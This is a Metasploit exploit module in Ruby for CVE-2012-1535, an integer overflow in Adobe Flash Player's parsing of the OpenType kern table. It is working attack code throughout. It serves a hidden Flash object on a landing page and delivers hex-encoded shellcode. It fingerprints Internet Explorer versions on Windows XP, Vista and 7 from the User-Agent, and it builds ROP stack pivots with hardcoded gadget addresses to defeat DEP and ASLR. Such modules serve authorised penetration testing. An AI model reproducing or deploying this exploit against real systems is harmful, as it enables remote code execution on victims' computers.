##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
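class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  # Flash builds for which the bundled SWF ROP chain is known to work, keyed by the
  # comma-separated version string the plugin reports in its x-flash-version header.
  # 'target' is the tag looked up in the RopDb 'flash' entry; 'xchg' is the build
  # specific "xchg eax, esp # ret" gadget used as the final stack pivot.
  SWF_ROP_PIVOTS = {
    '11,3,300,257' => { 'target' => '11.3.300.257', 'xchg' => 0x1001d891 },
    '11,3,300,265' => { 'target' => '11.3.300.265', 'xchg' => 0x1001d6d3 },
    '11,3,300,268' => { 'target' => '11.3.300.268', 'xchg' => 0x1001d755 }
  }.freeze

  # "POP EDI # POP ESI # RETN" gadget shared by every SWF pivot (lands at 1e0d0000).
  SWF_POP_POP_RET = 0x10004171

  # Address every no-DEP target and every pivot sprays/pads with.
  SPRAY_ADDR = 0x0c0c0c0c

  # User-Agent fingerprints for automatic target selection:
  # [OS token, browser token, index into 'Targets'].  The indices are coupled to the
  # order of the 'Targets' array in initialize; keep both in sync.
  UA_TARGETS = [
    [/NT 5\.1/, /MSIE 6/, 1], # IE 6 on Windows XP SP3
    [/NT 5\.1/, /MSIE 7/, 2], # IE 7 on Windows XP SP3
    [/NT 5\.1/, /MSIE 8/, 3], # IE 8 on Windows XP SP3
    [/NT 6\.0/, /MSIE 7/, 4], # IE 7 on Windows Vista SP2
    [/NT 6\.1/, /MSIE 8/, 5], # IE 8 on Windows 7 SP1
    [/NT 6\.1/, /MSIE 9/, 6]  # IE 9 on Windows 7 SP1
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in the ActiveX component of Adobe
          Flash Player before 11.3.300.271. By supplying a specially crafted .otf font file
          with a large nTables value in the 'kern' header, it is possible to trigger an
          integer overflow, which results in remote code execution under the context of the
          user. This vulnerability has also been exploited in the wild in limited targeted
          attacks. Please note in order to ensure reliability, the exploit is forced to
          modify your URIPATH parameter to less than 3 characters, which may cause possible
          URIPATH collisions.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Alexander Gavrun', # Through iDefense
          'sinn3r',
          'juan vazquez'
        ],
        'References' => [
          [ 'CVE', '2012-1535' ],
          [ 'OSVDB', '84607'],
          [ 'BID', '55009'],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/' ],
          [ 'URL', 'https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html' ],
          [ 'URL', 'http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-18.html']
        ],
        'Payload' => {
          'Space' => 1024
        },
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Platform' => 'win',
        # 'Rop' => nil marks targets without DEP (plain spray prefix is enough);
        # 'Rop' => true requires a ROP chain and 'ASLR' decides whether the Flash
        # module's fixed SWF chain is usable (see get_payload).
        'Targets' => [
          # Tested successfully on:
          #   Flash 11.2.202.233
          #   Flash 11.3.300.268
          #   Flash 11.3.300.265
          #   Flash 11.3.300.257
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil } ],
          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil } ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => true, 'ASLR' => false } ],
          [ 'IE 7 on Windows Vista SP2', { 'Rop' => nil }],
          [ 'IE 8 on Windows 7 SP1', { 'Rop' => true, 'ASLR' => true } ],
          [ 'IE 9 on Windows 7 SP1', { 'Rop' => true, 'ASLR' => true } ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-08-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptEnum.new('ROP', [true, "The ROP chain to use", 'SWF', %w(SWF JRE)]),
      ]
    )
  end

  # Build the bytes served on the ".txt" request: a three-dword prefix (spray address
  # or stack pivot) followed by the ROP chain, if any, and the encoded payload.
  #
  # @param t [Msf::Module::Target] selected target; 'Rop' => nil means no DEP bypass
  #   is needed, otherwise 'ASLR' and the ROP option pick the chain
  # @param flash_version [String, nil] the client's x-flash-version header, used only
  #   to pick a version-matched SWF chain; it is client-supplied, so a wrong or spoofed
  #   value just selects the wrong chain
  # @return [String] raw payload bytes (hex-encoded later by on_request_uri)
  def get_payload(t, flash_version = nil)
    # No DEP: the prefix is just the sprayed address repeated (1e0d0000 / 1e0d0008).
    if t['Rop'].nil?
      return [SPRAY_ADDR, SPRAY_ADDR, SPRAY_ADDR].pack('V*') + payload.encoded
    end

    # The SWF chain lives in Flash itself, so it is only usable on non-ASLR targets
    # and only for the builds whose gadgets we know.  'ASLR' is a tri-state table
    # value here (nil/true/false), hence the explicit comparison.
    swf_rop = nil
    if t['ASLR'] == false && datastore['ROP'] == 'SWF'
      _, swf_rop = SWF_ROP_PIVOTS.find { |ver, _| flash_version.to_s.include?(ver) }
    end

    if swf_rop
      print_status("Using Rop Chain For Flash: #{flash_version}")
      pivot = [
        SWF_POP_POP_RET,  # POP EDI # POP ESI # RETN (1e0d0000)
        SPRAY_ADDR,
        swf_rop['xchg']   # xchg eax, esp # ret (1e0d0008)
      ].pack('V*')
      generate_rop_payload('flash', payload.encoded, { 'target' => swf_rop['target'], 'pivot' => pivot })
    else
      # Fallback (ASLR targets, ROP=JRE, or unknown Flash build): pivot through the
      # non-ASLR JRE module addresses and use the RopDb 'java' chain.
      print_status("Default back to JRE ROP")
      pivot = [
        0x7c34a028, # POP EDI # POP ESI # RETN (1e0d0000)
        SPRAY_ADDR,
        0x7c348b05  # xchg eax, esp # ret (1e0d0008)
      ].pack('V*')
      generate_rop_payload('java', payload.encoded, { 'pivot' => pivot })
    end
  end

  # Resolve the target for a request.
  #
  # @param agent [String, nil] the client's User-Agent header (client-supplied; a
  #   spoofed value only mis-selects the target)
  # @return [Msf::Module::Target, nil] the explicitly chosen target, the fingerprinted
  #   one, or nil when the browser/OS pair is not in UA_TARGETS
  def get_target(agent)
    # If the user already picked a target, honour it regardless of the User-Agent.
    return target if target.name != 'Automatic'

    ua = agent.to_s
    match = UA_TARGETS.find { |os_re, browser_re, _| ua =~ os_re && ua =~ browser_re }
    match ? targets[match[2]] : nil
  end

  # Serve the three resources the attack needs: the landing HTML, the SWF, and the
  # hex-encoded payload the SWF fetches as ".txt".  Unsupported browsers get a 404.
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting.
    if my_target.nil?
      print_error("Browser not supported: #{agent}")
      send_not_found(cli)
      return
    end

    print_status("Target selected: #{my_target.name}")
    print_status("Client requesting: #{request.uri}")

    uri = request.uri.to_s

    # The SWF request itself.
    if uri.end_with?('.swf')
      print_status("Sending SWF")
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    # The TXT payload request.  The Flash build is taken from the client's own header.
    if uri.end_with?('.txt')
      flash_version = request.headers['x-flash-version']
      shellcode = get_payload(my_target, flash_version).unpack1('H*')
      print_status("Sending Payload")
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
      return
    end

    # Landing page.  The SWF is served from "<name>.txt.swf" and receives the short
    # resource name via FlashVars so it can locate the ".txt" payload.
    swf_uri = "/#{@resource_name}.txt.swf"

    html = <<~HTML
      <html>
      <head>
      </head>
      <body>
      <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
      <param name="movie" value="#{swf_uri}">
      <param name="FlashVars" value="s=#{@resource_name}">
      </object>
      </body>
      </html>
    HTML

    print_status("Sending HTML")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end

  # Register the fixed ".txt" payload URI as an extra resource so that the SWF's
  # direct request for it (outside URIPATH) still reaches on_request_uri.
  def primer
    hardcoded_uripath("/#{@resource_name}.txt")
  end

  # Load the SWF, pick the resource name, force a short URIPATH and start the server.
  def exploit
    @swf = create_swf
    @resource_name = Rex::Text.rand_text_alpha(5)
    vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")

    # Reliability requires a very short URIPATH (see Description).  The path is
    # normalised to start with '/' and then cut to 3 characters *including* that
    # slash, so at most two characters of the user's value survive; collisions with
    # other modules' URIPATHs are therefore possible.
    datastore['URIPATH'] = datastore['URIPATH'] || random_uri
    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
    datastore['URIPATH'] = datastore['URIPATH'][0, 3] if datastore['URIPATH'].length > 3
    print_warning("URIPATH set to #{datastore['URIPATH']}")

    super
  end

  # Read the prebuilt exploit SWF shipped in the framework's data directory.
  #
  # @return [String] the SWF bytes
  def create_swf
    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2012-1535", "Main.swf")
    # binread closes the handle even if the read raises (the previous open/read/close
    # sequence leaked the descriptor on error).
    ::File.binread(path)
  end
end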